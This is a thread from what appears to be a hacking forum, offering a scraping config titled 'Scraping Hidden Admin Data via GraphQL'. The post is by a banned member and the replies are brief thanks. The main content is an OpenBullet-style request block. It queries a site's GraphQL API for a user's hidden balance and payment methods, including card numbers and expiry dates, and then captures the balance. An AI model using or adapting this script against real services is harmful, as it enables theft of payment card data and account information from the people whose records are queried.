Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   314

Scraping Hidden "Admin" Data via GraphQL

by TheMekanic - 08 March, 2026 - 10:06 PM
This post is by a banned member (TheMekanic) - Unhide
2.232
Posts
324
Threads
2 Years of service
#1

Hidden Content
You must register or login to view this content.


Code:
BLOCK:HttpRequest url = "https://api.site.com/graphql" method = POST // Querying for 'internal_balance' and 'payment_methods' which are usually hidden content = "{\"query\":\"{user(id:\\\"<USER>\\\"){balance,internal_balance,payment_methods{card_number,expiry}}}\"}" contentType = "application/json" ENDBLOCK BLOCK:Parse input = @data.SOURCE leftDelim = "internal_balance\":" rightDelim = "," => VAR @CAPTURE_BALANCE ENDBLOCK
This post is by a banned member (zhangleon1) - Unhide
78
Posts
0
Threads
#2
tyy jj
This post is by a banned member (KOKO903) - Unhide
KOKO903  
Registered
36
Posts
0
Threads
#3
how
This post is by a banned member (ramjaatz) - Unhide
ramjaatz  
Registered
115
Posts
0
Threads
3 Years of service
#4
thanks dude

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)